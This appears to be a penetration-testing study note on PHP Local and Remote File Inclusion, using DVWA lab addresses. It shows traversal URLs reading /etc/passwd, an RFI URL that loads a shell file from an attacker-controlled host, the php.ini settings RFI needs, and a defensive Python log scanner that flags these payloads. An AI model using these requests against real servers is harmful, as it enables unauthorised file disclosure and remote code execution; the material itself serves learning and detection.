LFI and RFI

LFI Basics

Local File Inclusion (LFI) vulnerabilities allow an attacker to use specially crafted requests to read local files on the web server (including log files and configuration files containing password hashes or even cleartext passwords). LFI vulnerabilities can also lead to remote code execution on the target web server and a denial of service (DoS). Most, if not all, web application frameworks support file inclusion, and file inclusion vulnerabilities are often the result of poor user input validation.

  • We can check for LFI with the following syntax:

Consider this example:

http://192.168.119.13/include?page=index.php

The application loads index.php through a PHP function, so we can check whether it will also load and print other files for us:

http://192.168.119.13/include?page=/etc/passwd

http://192.168.119.13/include?page=../../../../../etc/passwd

If we get the contents of /etc/passwd back, the target is vulnerable to LFI.

RFI Basics

  • RFI stands for Remote File Inclusion. Where LFI includes files stored on the local system, RFI includes files from remote locations, on a web server for example. Let’s see if we can include a remote file too on the DVWA application by entering an external URL in the page parameter. For this demonstration we have loaded a text file named exploit.txt on a remote server with the IP address 172.16.1.4 (because the text file is on a remote server we don’t have to work with a current working directory with the ../ value but we can reference it directly):

  • Remote File Inclusions (RFI) are very similar to LFI but affect files on remote servers instead of files on the local web server. Remote files can include malicious code that executes on the server in the context of the user running the web server or on any client devices that visit a compromised webpage.

We can exploit RFI by adding our own shell at the end of the vulnerable endpoint, something like this:

http://10.11.1.250/dvwa/vulnerabilities/fi/?page=http://172.16.1.4/exploit.txt
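From the defender's side, the request shapes shown in both sections above (an absolute path, a ../ traversal, or a remote URL in the page parameter) can be flagged in web server access logs. The following is an added example, not part of the original notes; the log lines are constructed and the names classify and scan are hypothetical.

```python
import re
from urllib.parse import parse_qs, unquote

# Constructed access-log lines; the request paths mirror the URLs on this page.
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Jan/2024:10:00:00 +0000] "GET /include?page=index.php HTTP/1.1" 200 512',
    '192.0.2.44 - - [01/Jan/2024:10:00:05 +0000] "GET /include?page=/etc/passwd HTTP/1.1" 200 1804',
    '192.0.2.44 - - [01/Jan/2024:10:00:09 +0000] "GET /include?page=../../../../../etc/passwd HTTP/1.1" 200 1804',
    '192.0.2.44 - - [01/Jan/2024:10:00:12 +0000] "GET /include?page=%252e%252e%252fetc%252fpasswd HTTP/1.1" 200 1804',
    '192.0.2.44 - - [01/Jan/2024:10:00:20 +0000] "GET /dvwa/vulnerabilities/fi/?page=http://172.16.1.4/exploit.txt HTTP/1.1" 200 90',
]

REQUEST_RE = re.compile(r'"[A-Z]+ (\S+) HTTP/[0-9.]+"')
SCHEME_RE = re.compile(r"^[a-z][a-z0-9+.-]*://")


def classify(value):
    """Return a label for a suspicious include-parameter value, else None."""
    for _ in range(3):  # undo nested percent-encoding (%252e -> %2e -> .)
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    norm = value.replace("\\", "/").lower()
    if SCHEME_RE.match(norm):
        return "remote-url"      # RFI attempt: the value is a URL
    if "../" in norm or norm.endswith("/..") or norm == "..":
        return "path-traversal"  # LFI attempt: climbs out of the web root
    if norm.startswith("/"):
        return "absolute-path"   # LFI attempt: names a file by full path
    return None


def scan(lines, param="page"):
    """Return (line_number, label, value) for each flagged request."""
    findings = []
    for number, line in enumerate(lines, start=1):
        match = REQUEST_RE.search(line)
        if not match:
            continue
        query = match.group(1).partition("?")[2]
        for raw in parse_qs(query).get(param, []):  # parse_qs decodes once
            label = classify(raw)
            if label:
                findings.append((number, label, raw))
    return findings


if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

A hit only shows that the request was attempted; whether the include succeeded has to be judged from the response and the application's behaviour.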

Settings Required for RFI to Work

The first warning indicates that URL file-access is disabled in the server configuration. Without URL file access enabled we’re unable to include files from remote locations, such as our attack box. To successfully include remote files in PHP there are a few parameters in the "php.ini" file that must be enabled:

allow_url_fopen = On

allow_url_include = On

These settings are shown on the phpinfo.php page, so we can check whether they are enabled, which the RFI attack needs in order to succeed:

http://10.11.1.250/dvwa/phpinfo.php
